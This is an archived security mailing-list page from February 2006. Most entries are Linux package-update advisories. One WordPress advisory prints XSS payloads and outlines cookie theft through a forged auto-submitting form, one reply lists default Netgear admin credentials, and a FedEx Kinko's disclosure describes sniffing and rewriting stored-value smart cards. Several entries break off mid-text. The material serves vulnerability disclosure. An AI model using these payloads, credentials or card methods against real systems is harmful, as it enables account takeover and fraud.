[FLSA-2006:177326] Updated mod_auth_pgsql package fixes security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated mod_auth_pgsql package fixes security issue
Advisory ID:   FLSA:177326
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-3656
-


-
1. Topic:

An updated mod_auth_pgsql package that fixes a format string flaw is now
available.

The mod_auth_pgsql package is an httpd module that allows user
authentication against information stored in a PostgreSQL database.

2. Relevant releases/architectures:

Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

Several format string flaws were found in the way mod_auth_pgsql logs
information. It may be possible for a remote attacker to execute
arbitrary code as the 'apache' user if mod_auth_pgsql is used for user
authentication. The Common Vulnerabilities and Exposures project
assigned the name CVE-2005-3656 to this issue.

Please note that this issue only affects servers which have
mod_auth_pgsql installed and configured to perform user authentication
against a PostgreSQL database.

All users of mod_auth_pgsql should upgrade to these updated packages,
which contain a backported patch to resolve this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177326

6. RPMs required:

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

e6ce19c8be5f4638e2050437c4529b0d4a0f5e1f
fedora/1/updates/i386/mod_auth_pgsql-2.0.1-3.1.legacy.i386.rpm
119b3b6045eaa3b175ebe3d613daca8e9c81b35c
fedora/1/updates/SRPMS/mod_auth_pgsql-2.0.1-3.1.legacy.src.rpm

8f9c2503b417db84b73483e6daca445c4789e4e4
fedora/2/updates/i386/mod_auth_pgsql-2.0.1-4.2.legacy.i386.rpm
52aabaff10fb0f862e1b96199facb7da046e94dc
fedora/2/updates/SRPMS/mod_auth_pgsql-2.0.1-4.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3656

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature


[ MDKSA-2005:050 ] - Updated unzip packages fix vulnerabilities

2006-02-28 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:050
 http://www.mandriva.com/security/
 ___
 
 Package : unzip
 Date: February 27, 2005
 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A buffer overflow was foiund in how unzip handles file name arguments.
 If a user could tricked into processing a specially crafted,
 excessively long file name with unzip, an attacker could execute
 arbitrary code with the user's privileges.
 
 The updated packages have been patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4667
 ___
 
 Updated Packages:
 
 Mandriva Linux 10.2:
 56ed53b98b79934d0f4292a4e067eae6  10.2/RPMS/unzip-5.51-1.3.102mdk.i586.rpm
 33b9f50fab728e3b3c38c6d4f4002314  10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm

 Mandriva Linux 10.2/X86_64:
 4dde5ce45056867be10129f61df4  
x86_64/10.2/RPMS/unzip-5.51-1.3.102mdk.x86_64.rpm
 33b9f50fab728e3b3c38c6d4f4002314  
x86_64/10.2/SRPMS/unzip-5.51-1.3.102mdk.src.rpm

 Mandriva Linux 2006.0:
 3d3dcc95fccacd8033c452774994da1e  2006.0/RPMS/unzip-5.52-1.3.20060mdk.i586.rpm
 d45d6caaf656e5f04ce934a61a48a3e6  2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 b73080d55771a4a9572d9879b55db012  
x86_64/2006.0/RPMS/unzip-5.52-1.3.20060mdk.x86_64.rpm
 d45d6caaf656e5f04ce934a61a48a3e6  
x86_64/2006.0/SRPMS/unzip-5.52-1.3.20060mdk.src.rpm

 Corporate 3.0:
 9ebf9de576ed5f9ca73362e7bea27849  
corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.i586.rpm
 f3693c4ebec532b5a86f382981c81a4c  
corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 adce6e507a360b3132ec83f038d44bd7  
x86_64/corporate/3.0/RPMS/unzip-5.50-9.3.C30mdk.x86_64.rpm
 f3693c4ebec532b5a86f382981c81a4c  
x86_64/corporate/3.0/SRPMS/unzip-5.50-9.3.C30mdk.src.rpm

 Multi Network Firewall 2.0:
 075d5b7cefc2a93053e48dde5adb09ee  mnf/2.0/RPMS/unzip-5.50-9.3.M20mdk.i586.rpm
 12e0a95ab72239096c9110f8a1f98661  mnf/2.0/SRPMS/unzip-5.50-9.3.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFEA6BNmqjQ0CJFipgRAoJjAJ9UN4JOLy01p4Q7EEFd00qZLscJewCgmd0S
V/F+PgbvOJAUXE2mu9eDfKs=
=sIYU
-END PGP SIGNATURE-



[SECURITY] [DSA 983-1] New pdftohtml packages fix several vulnerabilities

2006-02-28 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 983-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
February 28th, 2006 http://www.debian.org/security/faq
- --

Package: pdftohtml
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no

Derek Noonburg has fixed several potential vulnerabilities in xpdf,
which are also present in pdftohtml, a utility that translates PDF
documents into HTML format.

The old stable distribution (woody) does not contain pdftohtml packages.

For the stable distribution (sarge) these problems have been fixed in
version 0.36-11sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 0.36-12.

We recommend that you upgrade your gpdf package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.dsc
  Size/MD5 checksum:  602 8dc87f9f04bf4e95d628a81540b5320e

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2.diff.gz
  Size/MD5 checksum:11953 aa4fe47eeec4ff81df92aab8f218f1f1

http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36.orig.tar.gz
  Size/MD5 checksum:   300922 75ad095bb51e1f66c9f7691e6af12f44

  Alpha architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_alpha.deb
  Size/MD5 checksum:   314142 b5bd8a038769a31b74bc9baf7498

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_amd64.deb
  Size/MD5 checksum:   259728 a16f018455f8e3409399f9123af3c17a

  ARM architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_arm.deb
  Size/MD5 checksum:   266500 bbf302ca14ddad34769b0b8a5822d139

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_i386.deb
  Size/MD5 checksum:   253988 fd6e84484e62b90ff4eb419bdff63044

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_ia64.deb
  Size/MD5 checksum:   374206 900ea16bffd41ff59272bab4e89077a9

  HP Precision architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_hppa.deb
  Size/MD5 checksum:   330356 4bf2182b3dc9f1269efb039c07fceea3

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_m68k.deb
  Size/MD5 checksum:   234812 34eb54fb6c07676aee15a9cc15110c28

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mips.deb
  Size/MD5 checksum:   311482 2540b6b4c0b523087a40fb4ef7b57c46

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_mipsel.deb
  Size/MD5 checksum:   307188 16034038f8c3c206623702c4b3695b69

  PowerPC architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_powerpc.deb
  Size/MD5 checksum:   269634 4053b1c0d6c76ca5c94ee97df412b5e5

  IBM S/390 architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_s390.deb
  Size/MD5 checksum:   242482 ff9f29460ad1cb56b4c92dfd3e1e2d57

  Sun Sparc architecture:


http://security.debian.org/pool/updates/main/p/pdftohtml/pdftohtml_0.36-11sarge2_sparc.deb
  Size/MD5 checksum:   245378 d1ecf4c546240dab174947827b01766e


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFEBCZ5W5ql+IAeqTIRAhc3AJ98FvheYHaNnpIW4lCYjqsVD0JDmQCeO54D
8x13RBAhHVkh9GvAHmI7Sx8=
=KfUo
-END PGP SIGNATURE-



[FLSA-2006:177694] Updated auth_ldap package fixes security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated auth_ldap package fixes security issue
Advisory ID:   FLSA:177694
Issue date:2006-02-27
Product:   Red Hat Linux
Keywords:  Bugfix
CVE Names: CVE-2006-0150
-


-
1. Topic:

An updated auth_ldap package that fixes a format string security issue
is now available for Red Hat Linux 7.3.

The auth_ldap package is an httpd module that allows user authentication
against information stored in an LDAP database.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

A format string flaw was found in the way auth_ldap logs information. It
may be possible for a remote attacker to execute arbitrary code as the
'apache' user if auth_ldap is used for user authentication. The Common
Vulnerabilities and Exposures project (cve.mitre.org) assigned the name
CVE-2006-0150 to this issue.

Note that this issue only affects servers that have auth_ldap installed
and configured to perform user authentication against an LDAP database.

All users of auth_ldap should upgrade to this updated package, which
contains a backported patch to resolve this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=177694

6. RPMs required:

Red Hat Linux 7.3:
SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm


7. Verification:

SHA1 sum Package Name
-

38f70135bc17c313fecdb81f61e776ac032b796e
redhat/7.3/updates/i386/auth_ldap-1.6.0-4.2.legacy.i386.rpm
78b7ee876d5b900ff5268b1a396a59ca9f2385f0
redhat/7.3/updates/SRPMS/auth_ldap-1.6.0-4.2.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature


[FLSA-2006:157366] Updated PostgreSQL packages fix security issues

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated PostgreSQL packages fix security issues
Advisory ID:   FLSA:157366
Issue date:2006-02-27
Product:   Red Hat Linux, Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-1409 CVE-2005-1410
-


-
1. Topic:

Updated postgresql packages that fix several security vulnerabilities
and risks of data loss are now available.

PostgreSQL is an advanced Object-Relational database management system
(DBMS) that supports almost all SQL constructs (including
transactions, subselects and user-defined types and functions).

2. Relevant releases/architectures:

Red Hat Linux 9 - i386
Fedora Core 1 - i386
Fedora Core 2 - i386

3. Problem description:

The PostgreSQL community discovered two distinct errors in initial
system catalog entries that could allow authorized database users to
crash the database and possibly escalate their privileges. The Common
Vulnerabilities and Exposures project (cve.mitre.org) has assigned the
names CVE-2005-1409 and CVE-2005-1410 to these issues.

Although installing this update will protect new (freshly initdb'd)
database installations from these errors, administrators MUST TAKE
MANUAL ACTION to repair the errors in pre-existing databases. The
appropriate procedures are explained at
http://www.postgresql.org/docs/8.0/static/release-7-4-8.html
for Fedora Core 2 users, or
http://www.postgresql.org/docs/8.0/static/release-7-3-10.html
for Fedora Core 1 and Red Hat Linux 9 users.

This update also includes fixes for several other errors, including two
race conditions that could result in apparent data inconsistency or
actual data loss.

All users of PostgreSQL are advised to upgrade to these updated packages
and to apply the recommended manual corrections to existing databases.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=157366

6. RPMs required:

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/postgresql-7.3.10-0.90.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-contrib-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-devel-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-docs-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-jdbc-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-libs-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-pl-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-python-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-server-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-tcl-7.3.10-0.90.1.legacy.i386.rpm
http://download.fedoralegacy.org/redhat/9/updates/i386/postgresql-test-7.3.10-0.90.1.legacy.i386.rpm

Fedora Core 1:

SRPM:
http://download.fedoralegacy.org/fedora/1/updates/SRPMS/postgresql-7.3.10-1.1.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-contrib-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-devel-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-docs-7.3.10-1.1.legacy.i386.rpm
http://download.fedoralegacy.org/fedora/1/updates/i386/postgresql-jdbc-7.3.10-1.1.legacy.i386.rpm

WordPress 2.0.1 Multiple Vulnerabilities

2006-02-28 Thread k4p0k4p0
/*
---
[N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple Vulnerabilities
---
Program : WordPress 2.0
Homepage: http://www.wordpress.org
Vulnerable Versions: WordPress 2.0.1  lower ones
Risk: Critical!
Impact: XSS, Full Path Disclosure, Directory Listing

- WordPress 2.0.1 Multiple Vulnerabilities -
---

- Description
---
WordPress is a state-of-the-art semantic personal publishing 
platform with a focus on aesthetics, web standards, and usability. 
What a mouthful. WordPress is both free and priceless at the same time.

- Tested
---
Tested in localhost  many blogs

- Bug
---
The vendor was contacted about some other coding errors that are not 
described here, the vendor was noticed about these bugs when this 
advisory was published.

+ Multiple XSS +
There're multiple XSS in `post comment':

[1] `name' variable is not filtered when it's assigned to `value'
on the `input' in the form when the comment it's posted.
[2] Happends the same as [1] with `website' variable.
[3] `comment', this variable only filtered  and ' chars, this makes 
possible to use  and , thus this permit an attacker to inject 
any HTML (or script) code that he/she want but without any  or ' 
character, this only happends if the user that post the comment it's 
the admin (any registered kind of `user'). 

If you (or victim) is a unregistered user, you can use  and ' in your 
HTML/script Injection using `name' or `website' variables, but if the 
victim is the admin or a registered user these 2 fields described above 
aren't availabe in the form so you cannot even give a value to them.
The only remaining option it's to use the `comment' variable but here 
we have the problem that we cannot use  or ' in HTML/SCRIPT Injected and 
we have to make the admin to post the comment (POST method).

+ Full path disclosure  Directory listing +
When I discovered this bug, I reported it to some pepople before 
public disclosure, I was noticed that this isn't new and I 
decided to look why they haven't patch this bug. 

As this bug it isn't patched yet, I tryed to know why and I found 
something like this in their forum (I don't know if the person 
that posted this was the admin but it gives the explanation):
(Something like the following, it's not textual).
`... these bugs are caused by badly configured .ini file, it's not 
a bug generated by the script so it cannot be accepted as a bug of 
WordPress...'. This is not an acceptable answer, if you think it is, 
a bug caused because of register_globals is Off it's .ini fault and not 
the script, they have to be kidding, if they want to make good software, 
they have to make as far as the language can, to prevent all bugs.

There're multiple files that don't check if they are been call 
directly. This is a problem because they expect that functions 
that the script is going to be called to be declared.
This kind of bug it's taken as a Low Risk bug, but it can help 
to future attacks.

- Exploit
---
-- Cross Site Scripting (XSS)
PoC:
[1] Post a comment with the following values (as unregistered user):
(No possible profit)

Name   : scriptalert(WordPress PoC from);/script
Mail   : [EMAIL PROTECTED]
Website: scriptalert([N]eo[S]ecurity[T]eam 
www.neosecurityteam.net);/script
Comment: www.neosecurityteam.net/foro/

The injected HTML code only affects the user that posted it, not others.

[2] This way it's more intresting and useful. 
In this case the HTML Injected will stay in the board affecting each person 
who see it. 
But we have two problems:
[I ]- This comment must be posted by the admin
[II]- We only can use the `comment' field, because the admin form to make 
  the comment doesn't need the `name' or `website'.
  Also the injected code cannot have any  or ' chars.

Here are my solutions:
[I ]- We cannot give to the admin a `malicius' URL to steal the cookie
  because it isn't via GET, it's via POST. So the solution it's to 
  make a copy form of the real one and set the default values to 
  the corresonding field (`comment') to make the stealing.
  Also make the form submit itself when the page loads. Thus, we give 
  the admin the URL of this form and he/she will post the comment 
  with the values we set before. :)
[II]- We can only use this field to make the injection, the `big' problem 
  its that we cannot use  or ' chars wich means that something like 
  window.location = http://www.google.com.uy;; won't work.
 
Here are some real examples:

- scriptalert(document.cookie)/script
- 

[FLSA-2006:175818] Updated udev packages fix a security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated udev packages fix a security issue
Advisory ID:   FLSA:175818
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2005-3631
-


-
1. Topic:

Updated udev packages that fix a security issue are now available.

The udev package contains an implementation of devfs in userspace using
sysfs and /sbin/hotplug.

2. Relevant releases/architectures:

Fedora Core 2 - i386
Fedora Core 3 - i386, x86_64

3. Problem description:

Richard Cunningham discovered a flaw in the way udev sets permissions on
various files in /dev/input. It may be possible for an authenticated
attacker to gather sensitive data entered by a user at the console, such
as passwords. The Common Vulnerabilities and Exposures project has
assigned the name CVE-2005-3631 to this issue.

All users of udev should upgrade to these updated packages, which
contain a backported patch and are not vulnerable to this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
RPMs which are currently installed will be updated.  Those RPMs which
are not installed but included in the list will not be updated.  Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt.  Many
people find this an easier way to apply updates.  To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system.  This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www.fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175818

6. RPMs required:

Fedora Core 2:

SRPM:
http://download.fedoralegacy.org/fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm

Fedora Core 3:

SRPM:
http://download.fedoralegacy.org/fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm

i386:
http://download.fedoralegacy.org/fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm

x86_64:
http://download.fedoralegacy.org/fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm

7. Verification:

SHA1 sum Package Name
-

d2b2850b4066a595a4d3c162e151dc27c5b43198
fedora/2/updates/i386/udev-024-6.2.legacy.i386.rpm
9ed5ef68d64987f8f644da065399d6885e7e1176
fedora/2/updates/SRPMS/udev-024-6.2.legacy.src.rpm

a2682a89f6fe03c2f2c2401caa511c299c1ae1cc
fedora/3/updates/i386/udev-039-10.FC3.9.legacy.i386.rpm
fbcf92e15337b34511d4a305100d6797d644a84e
fedora/3/updates/x86_64/udev-039-10.FC3.9.legacy.x86_64.rpm
fe4e15a6ac3d4d80ce3db01f08a75c93985964e8
fedora/3/updates/SRPMS/udev-039-10.FC3.9.legacy.src.rpm

These packages are GPG signed by Fedora Legacy for security.  Our key is
available from http://www.fedoralegacy.org/about/security.php

You can verify each package with the following command:

rpm --checksig -v filename

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

sha1sum filename

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3631

9. Contact:

The Fedora Legacy security contact is [EMAIL PROTECTED]. More
project details at http://www.fedoralegacy.org

-


signature.asc
Description: OpenPGP digital signature


Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability

2006-02-28 Thread James Garrison

Not my WG602v2.

[EMAIL PROTECTED] wrote:

Netgear WG602 reportedly contains a default administrative account. This issue 
can allow a remote attacker to gain administrative access to the device.

super_username=Gearguy 
super_passwd=Geardog



  




Fedex Kinkos Smart Card Authentication Bypass

2006-02-28 Thread Lance James
Abstract:
-
The ExpressPay stored-value card system used by FedEx Kinko's is
vulnerable to attack.  An attacker who gains the ability to alter the
data stored on the card can use FedEx Kinko's services fraudulently
and anonymously, and can even obtain cash from the store.


Description:

The FedEx Kinko's ExpressPay system, developed by enTrac Technologies
of Toronto, Ontario, is based on a Siemens / Infineon SLE4442 memory
chip card.  The data stored on this card is freely rewritable once a
three-byte security code has been presented to the card's security
logic.  Neither this security code nor the data stored on the card is
encrypted; anyone able to obtain the security code is free to rewrite
the data stored on the card using an inexpensive commercially
available smart card reader/writer.

The first thirty-two bytes of the memory chip card are writable and
subsequently permanently write-protectable (in this application, these
bytes are write-protected), and contain a header which identifies the
card as an ExpressPay stored-value card.  Bytes 0x20 through 0x27
contain the value stored on the card, represented in IEEE 754
double-precision floating point format.  Bytes 0x60 through 0x6A
contain the card's eleven-digit serial number stored as unsigned
zoned-decimal ASCII; digits 0x60 through 0x63 are the store number the
card was initially issued at, and the remaining seven digits are
assigned sequentially at the moment of first issue.  A timestamp
indicating date and time of issue are located from 0x30 through 0x37,
and is repeated from 0xC7 through 0xCE.

In order to write to the card, a three-byte security code must be
presented in a specific sequence of commands as outlined by the
SLE4442's white paper.  By soldering wires to the contact points of
the card and then connecting those wires to an inexpensive logic
analyzer, an attacker can sniff the three-byte code as the kiosk or a
card terminal prepares to write data to the card.  This security code
appears to be the same across all FedEx Kinko's ExpressPay cards
currently in circulation.

Once the three-byte code is known to the attacker, the card's stored
value and serial number can be changed to any value.  The ExpressPay
system appears to implicitly trust the value stored on the card,
regardless of what that value actually is.  The system will also
accept cards with obviously fake serial numbers (e.g. a non-existent
store number followed by all nines).  Using these altered cards,
xeroxes can be made from any machine with a card reader, and computers
can be rented anonymously and indefinitely.  Most disturbing, however,
is that since stored-value cards can be cashed out by an employee at
the register at any time, an attacker could cash out altered cards
obtained at little or no monetary cost.  If a card is cashed out, its
serial number does not appear to be invalidated in the system.  If an
attacker were to clone a known good card and cash it out, the clone
would still be usable.


Tested Vendors:
---
- FedEx Kinko's


Suspected Vendors:
--
- Any client of enTrac Technologies who uses the ExpressPay
stored-value card system.
- Any company which uses a stored-value card system based on the SLE4442


Vendor and Patch Information:
-
Proof-of-concept of the initial security vulnerability was achieved on
8 February 2006, with research into the ramifications continuing
through 12 February.  Copies of this report were sent to both FedEx
Kinko's and enTrac Technologies on 15 February; a read receipt was
returned from enTrac on 19 February, while no receipt has yet been
received from FedEx Kinko's.


Solution:
-
- Encrypt data before storing it on the SLE4442 card, or migrate to a
system which uses cards which have built-in encryption functionality.
- Verify that the stored value on the card does not significantly
differ from a reference value stored in a database.
- Do not allow the use of cards with invalid serial numbers.
- Invalidate serial numbers of cards that are cashed out.


Credits:

Strom Carlson, Secure Science Corporation: Hardware Security Division
[EMAIL PROTECTED]



[FLSA-2006:181014] Updated gnutls packages fix a security issue

2006-02-28 Thread Marc Deslauriers
-
   Fedora Legacy Update Advisory

Synopsis:  Updated gnutls packages fix a security issue
Advisory ID:   FLSA:181014
Issue date:2006-02-27
Product:   Fedora Core
Keywords:  Bugfix
CVE Names: CVE-2006-0645
-


-
1. Topic:

Updated gnutls packages that fix a security issue are now available.

The GNU TLS Library provides support for cryptographic algorithms and
protocols such as TLS. GNU TLS includes Libtasn1, a library developed
for ASN.1 structures management that includes DER encoding and decoding.

2. Relevant releases/architectures:

Fedora Core 3 - i386, x86_64

3. Problem description:

Several flaws were found in the way libtasn1 decodes DER. An attacker
could create a carefully crafted invalid X.509 certificate in such a way
that could trigger this flaw if parsed by an application that uses GNU
TLS. This could lead to a denial of service (application crash). It is
not certain if this issue could be escalated to allow arbitrary code
execution. The Common Vulnerabilities and Exposures project assigned the
name CVE-2006-0645 to this issue.

Users are advised to upgrade to these updated packages, which contain a
backported patch from the GNU TLS maintainers to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade.  Only those
